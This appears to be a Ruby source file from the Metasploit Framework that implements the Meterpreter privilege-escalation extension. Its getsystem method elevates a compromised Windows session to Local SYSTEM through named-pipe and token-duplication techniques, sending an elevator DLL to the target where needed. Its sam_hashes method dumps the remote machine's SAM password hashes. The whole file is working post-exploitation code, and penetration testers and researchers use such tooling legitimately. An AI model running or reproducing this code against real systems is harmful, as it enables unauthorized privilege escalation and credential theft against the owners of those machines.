GitHub Repository: rapid7/metasploit-framework
Path: blob/master/lib/rex/post/meterpreter/extensions/priv/priv.rb
# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/priv/tlv'
require 'rex/post/meterpreter/extensions/priv/command_ids'
require 'rex/post/meterpreter/extensions/priv/passwd'
require 'rex/post/meterpreter/extensions/priv/fs'
module Rex
module Post
module Meterpreter
module Extensions
module Priv
###
#
# This meterpreter extension provides a privilege escalation interface that is capable
# of doing things like dumping password hashes and performing local
# exploitation.
#
###
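class Priv < Extension

  # Timeouts (seconds) for the two slow requests this extension issues.
  # Service-based elevation routines can be slow; a SAM dump on a large
  # domain controller can take far longer still.
  GETSYSTEM_TIMEOUT = 90
  SAM_HASHES_TIMEOUT = 3600

  def self.extension_id
    EXTENSION_ID_PRIV
  end

  TECHNIQUE = {
    any: 0,
    named_pipe: 1,
    named_pipe_2: 2,
    token_dup: 3,
    named_pipe_rpcss: 4,
    named_pipe_print_spooler: 5,
    named_pipe_efs: 6
  }.freeze

  # The service-based techniques (#1, #2, #3) need a service name TLV; #0
  # "any" is included because it may end up using one of them.
  SERVICE_NAME_TECHNIQUES = [
    TECHNIQUE[:any], TECHNIQUE[:named_pipe], TECHNIQUE[:named_pipe_2], TECHNIQUE[:token_dup]
  ].freeze

  # Only TokenDup and NamedPipe2 need the elevator DLL; #0 "any" is included
  # because it may end up using one of them.
  ELEVATOR_DLL_TECHNIQUES = [
    TECHNIQUE[:any], TECHNIQUE[:named_pipe_2], TECHNIQUE[:token_dup]
  ].freeze

  #
  # Initializes the privilege escalation extension.
  #
  # @param client [Object] the meterpreter client this extension attaches to
  #
  def initialize(client)
    super(client, 'priv')

    client.register_extension_aliases(
      [
        {
          'name' => 'priv',
          'ext' => self
        }
      ]
    )

    # Initialize sub-classes
    self.fs = Fs.new(client)
  end

  #
  # Attempt to elevate the meterpreter to Local SYSTEM.
  #
  # @param technique [Integer] one of the TECHNIQUE values; TECHNIQUE[:any]
  #   leaves the choice to the target side
  # @return [Array(Boolean, Integer)] [true, technique_used] on success,
  #   [false, 0] when the target reports a non-zero result or omits the
  #   technique TLV from its response
  # @raise [RuntimeError] when the elevator DLL is required but cannot be
  #   found for any of the client's binary suffixes
  #
  def getsystem(technique = TECHNIQUE[:any])
    request = Packet.create_request(COMMAND_ID_PRIV_ELEVATE_GETSYSTEM)

    # A fresh random service name is generated for every call.
    if SERVICE_NAME_TECHNIQUES.include?(technique)
      request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_NAME, Rex::Text.rand_text_alpha_lower(6))
    end

    # The elevator DLL is only read from disk and shipped across when a
    # technique that needs it may be used.
    if ELEVATOR_DLL_TECHNIQUES.include?(technique)
      elevator_data = elevator_dll_data
      request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data)
      request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length)
    end

    request.add_tlv(TLV_TYPE_ELEVATE_TECHNIQUE, technique)

    # Some service routines are slow, hence the longer-than-default timeout.
    response = client.send_request(request, GETSYSTEM_TIMEOUT)

    used_technique = response.get_tlv_value(TLV_TYPE_ELEVATE_TECHNIQUE)
    return [false, 0] unless response.result == 0 && !used_technique.nil?

    # stdapi is required for the session/privilege refresh that follows.
    client.core.use('stdapi') unless client.ext.aliases.include?('stdapi')
    client.update_session_info
    client.sys.config.getprivs
    report_getsystem(used_technique)

    [true, used_technique]
  end

  #
  # Returns an array of SAM hashes from the remote machine.
  #
  # @return [Array<SamUser>] one entry per line of the returned hash dump;
  #   empty when the response carries no hash TLV
  #
  def sam_hashes
    # This can take a long long time for large domain controllers, so the
    # request gets a one-hour timeout.
    request = Packet.create_request(COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES)
    response = client.send_request(request, SAM_HASHES_TIMEOUT)

    # A missing TLV previously raised NoMethodError on nil; treat it as
    # "no hashes returned" instead.
    raw_hashes = response.get_tlv_value(TLV_TYPE_SAM_HASHES)
    return [] if raw_hashes.nil?

    raw_hashes.split(/\n/).map { |line| SamUser.new(line) }
  end

  #
  # Modifying privileged file system attributes.
  #
  attr_reader :fs

  protected

  attr_writer :fs # :nodoc:

  private

  # Locates, reads and decrypts the elevator DLL for the first of the
  # client's binary suffixes that has one on disk.
  #
  # @return [String] the decrypted DLL bytes
  # @raise [RuntimeError] if no elevator DLL exists for any suffix
  def elevator_dll_data
    elevator_path = nil
    client.binary_suffix.each do |suffix|
      elevator_path = MetasploitPayloads.meterpreter_path('elevator', suffix)
      break unless elevator_path.nil?
    end

    if elevator_path.nil?
      missing = client.binary_suffix.map { |suffix| "elevator.#{suffix}" }.join(', ')
      raise RuntimeError, "#{missing} not found", caller
    end

    # The DLL is stored encrypted on disk and is decrypted before it is sent.
    encrypted_elevator_data = ::File.binread(elevator_path)
    ::MetasploitPayloads::Crypto.decrypt(ciphertext: encrypted_elevator_data)
  end

  # Records a successful elevation as a 'meterpreter.getsystem' note in the
  # framework database when one is active.
  #
  # Reporting is best-effort: a database error must not turn an elevation
  # that already succeeded into a failure, so StandardError from the note
  # call is swallowed (explicitly, where a `rescue nil` modifier used to be).
  #
  # @param used_technique [Integer] the technique the target reported using
  # @return [void]
  def report_getsystem(used_technique)
    db = client.framework.db
    return unless db && db.active

    begin
      db.report_note(
        host: client.sock.peerhost,
        workspace: db.workspace,
        type: 'meterpreter.getsystem',
        data: { technique: used_technique }
      )
    rescue StandardError
      nil
    end
  end

end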
end; end; end; end; end